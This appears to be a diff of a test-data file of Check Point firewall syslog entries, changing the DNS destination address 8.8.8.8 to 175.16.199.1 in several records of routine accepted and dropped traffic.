-<134>1 2020-03-29T18:02:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a5,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504933"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38232"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504933"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52036"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a5,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504933"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38232"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:02:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a5,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"23.100.50.51"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"36940"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:15Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504935"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33428"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:15Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a7,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504935"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39229"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:15Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a7,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504935"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56200"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:15Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504935"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33428"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:15Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a7,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504935"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39229"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:15Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a7,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504935"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56200"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:02:15Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a7,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.54.21"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"46980"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:02:15Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a7,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.81.140.246"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"57656"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:15Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a7,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504935"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53745"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:15Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a7,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504935"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53745"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:02:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a8,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.95"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50520"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504937"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56288"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a9,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504937"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57384"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504937"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56288"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a9,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504937"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57384"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:02:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a9,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.116"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58782"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:02:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e2ba,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52251"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:02:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e2ba,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"35694"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10159"; xlatesrc:"0.0.0.0"]
@@ -3580,8 +3580,8 @@
 <134>1 2020-03-29T18:06:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e389,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:06:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e38b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:06:17Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e39b,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"68"; service:"67"; service_id:"bootp"; src:"0.0.0.0"]
-<134>1 2020-03-29T18:06:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e3a1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40117"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:06:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e3a1,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505185"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33661"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:06:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e3a1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40117"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:06:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e3a1,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505185"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33661"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:06:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e3a1,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.116"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58784"; service:"443"; service_id:"https"; src:"192.168.2.2"]
